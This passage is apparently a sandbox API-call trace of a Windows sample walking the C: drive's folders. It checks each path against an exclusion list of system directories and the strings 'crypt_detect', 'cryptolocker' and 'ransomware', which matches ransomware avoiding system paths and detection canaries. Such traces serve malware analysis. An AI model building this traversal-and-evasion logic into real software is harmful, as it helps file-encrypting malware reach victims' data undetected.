StrNCatW (in: psz1="C:\\PerfLogs", psz2="\\*", cchMax=1048 | out: psz1="C:\\PerfLogs\\*") returned="C:\\PerfLogs\\*" [0119.107] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650e21, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0119.110] StrCmpW (psz1=".", psz2=".") returned 0 [0119.110] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650e21, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.110] StrCmpW (psz1="..", psz2=".") returned 1 [0119.110] StrCmpW (psz1="..", psz2="..") returned 0 [0119.110] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650e21, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0119.110] FindClose (in: hFindFile=0xec2030 | out: hFindFile=0xec2030) returned 1 [0119.110] GetProcessHeap () returned 0xe30000 [0119.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0119.110] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xf0ddeecc, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xf0ddeecc, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0119.110] StrCmpW (psz1="Program Files", psz2=".") returned 1 [0119.110] StrCmpW (psz1="Program Files", psz2="..") returned 1 [0119.110] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0119.110] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0119.111] StrNCatW (in: psz1="C:\\", psz2="Program Files", cchMax=1030 | out: psz1="C:\\Program Files") returned="C:\\Program Files" [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\windows\\system32\\") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\windows\\system\\") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\appdata\\local\\") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\boot\\") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\perflogs\\") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\programdata\\") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\drivers\\") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\wsus\\") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch="crypt_detect") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch="cryptolocker") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch="ransomware") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch="C:\\WINDOWS") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files", lpSrch="C:\\Program Files") returned="C:\\Program Files" [0119.111] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe7a165b3, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe7a165b3, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0119.111] StrCmpW (psz1="Program Files (x86)", psz2=".") returned 1 [0119.111] StrCmpW (psz1="Program Files (x86)", psz2="..") returned 1 [0119.111] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0119.111] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0119.111] StrNCatW (in: psz1="C:\\", psz2="Program Files (x86)", cchMax=1030 | out: psz1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0119.111] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\windows\\system32\\") returned 0x0 [0119.111] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\windows\\system\\") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\appdata\\local\\") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\boot\\") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\perflogs\\") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\programdata\\") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\drivers\\") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\wsus\\") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="crypt_detect") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="cryptolocker") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="ransomware") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="C:\\WINDOWS") returned 0x0 [0119.112] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0119.112] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0119.112] StrCmpW (psz1="ProgramData", psz2=".") returned 1 [0119.112] StrCmpW (psz1="ProgramData", psz2="..") returned 1 [0119.112] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0119.113] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0119.113] StrNCatW (in: psz1="C:\\", psz2="ProgramData", cchMax=1030 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\windows\\system32\\") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\windows\\system\\") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\appdata\\local\\") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\boot\\") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\perflogs\\") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\programdata\\") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\drivers\\") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\wsus\\") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="crypt_detect") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="cryptolocker") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="ransomware") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="C:\\WINDOWS") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.113] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="C:\\Program Files") returned 0x0 [0119.113] GetProcessHeap () returned 0xe30000 [0119.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x49e) returned 0xf0daf8 [0119.113] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0119.113] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\*", cchMax=1054 | out: psz1="C:\\ProgramData\\*") returned="C:\\ProgramData\\*" [0119.113] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*", lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440e1a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1b30 [0119.114] StrCmpW (psz1=".", psz2=".") returned 0 [0119.114] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440e1a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.114] StrCmpW (psz1="..", psz2=".") returned 1 [0119.114] StrCmpW (psz1="..", psz2="..") returned 0 [0119.114] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x450f4738, ftCreationTime.dwHighDateTime=0x1d327cd, ftLastAccessTime.dwLowDateTime=0x4511a9a6, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x4511a9a6, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440e1a, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0119.114] StrCmpW (psz1="Adobe", psz2=".") returned 1 [0119.114] StrCmpW (psz1="Adobe", psz2="..") returned 1 [0119.114] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0119.114] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0119.114] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="Adobe", cchMax=1054 | out: psz1="C:\\ProgramData\\Adobe") returned="C:\\ProgramData\\Adobe" [0119.114] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\windows\\system32\\") returned 0x0 [0119.114] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.114] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\windows\\system\\") returned 0x0 [0119.114] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.114] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.114] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\appdata\\local\\") returned 0x0 [0119.114] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.114] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.114] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.114] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch=":\\boot\\") returned 0x0 [0119.114] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch=":\\perflogs\\") returned 0x0 [0119.114] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Adobe" [0119.115] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0119.115] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0119.115] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0119.115] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbcb1c5f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1 [0119.115] StrCmpW (psz1="Comms", psz2=".") returned 1 [0119.115] StrCmpW (psz1="Comms", psz2="..") returned 1 [0119.115] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0119.115] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0119.115] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="Comms", cchMax=1054 | out: psz1="C:\\ProgramData\\Comms") returned="C:\\ProgramData\\Comms" [0119.115] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\windows\\system32\\") returned 0x0 [0119.115] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.115] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\windows\\system\\") returned 0x0 [0119.115] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.115] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.115] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\appdata\\local\\") returned 0x0 [0119.115] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.115] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.115] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.115] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch=":\\boot\\") returned 0x0 [0119.115] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch=":\\perflogs\\") returned 0x0 [0119.115] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Comms" [0119.115] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0119.115] StrCmpW (psz1="Desktop", psz2=".") returned 1 [0119.115] StrCmpW (psz1="Desktop", psz2="..") returned 1 [0119.115] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0119.115] StrCmpW (psz1="Documents", psz2=".") returned 1 [0119.115] StrCmpW (psz1="Documents", psz2="..") returned 1 [0119.115] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc93dc4da, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc93dc4da, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0119.115] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0119.115] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0119.115] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ecd6462, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x3ecd6462, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x3ecd6462, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft OneDrive", cAlternateFileName="MICROS~2")) returned 1 [0119.116] StrCmpW (psz1="Microsoft OneDrive", psz2=".") returned 1 [0119.116] StrCmpW (psz1="Microsoft OneDrive", psz2="..") returned 1 [0119.116] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0119.116] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0119.116] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="Microsoft OneDrive", cchMax=1054 | out: psz1="C:\\ProgramData\\Microsoft OneDrive") returned="C:\\ProgramData\\Microsoft OneDrive" [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\windows\\system32\\") returned 0x0 [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\windows\\system\\") returned 0x0 [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\appdata\\local\\") returned 0x0 [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch=":\\boot\\") returned 0x0 [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch=":\\perflogs\\") returned 0x0 [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Microsoft OneDrive" [0119.116] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa2d56a03, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa2d56a03, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa2d56a03, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oracle", cAlternateFileName="")) returned 1 [0119.116] StrCmpW (psz1="Oracle", psz2=".") returned 1 [0119.116] StrCmpW (psz1="Oracle", psz2="..") returned 1 [0119.116] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0119.116] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0119.116] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="Oracle", cchMax=1054 | out: psz1="C:\\ProgramData\\Oracle") returned="C:\\ProgramData\\Oracle" [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\windows\\system32\\") returned 0x0 [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\windows\\system\\") returned 0x0 [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\appdata\\local\\") returned 0x0 [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.116] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.117] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.117] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch=":\\boot\\") returned 0x0 [0119.117] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch=":\\perflogs\\") returned 0x0 [0119.117] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Oracle" [0119.117] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcf03b3d5, ftCreationTime.dwHighDateTime=0x1d327b7, ftLastAccessTime.dwLowDateTime=0xdefc9a0c, ftLastAccessTime.dwHighDateTime=0x1d327b7, ftLastWriteTime.dwLowDateTime=0xdefc9a0c, ftLastWriteTime.dwHighDateTime=0x1d327b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0119.117] StrCmpW (psz1="Package Cache", psz2=".") returned 1 [0119.117] StrCmpW (psz1="Package Cache", psz2="..") returned 1 [0119.117] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0119.117] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", 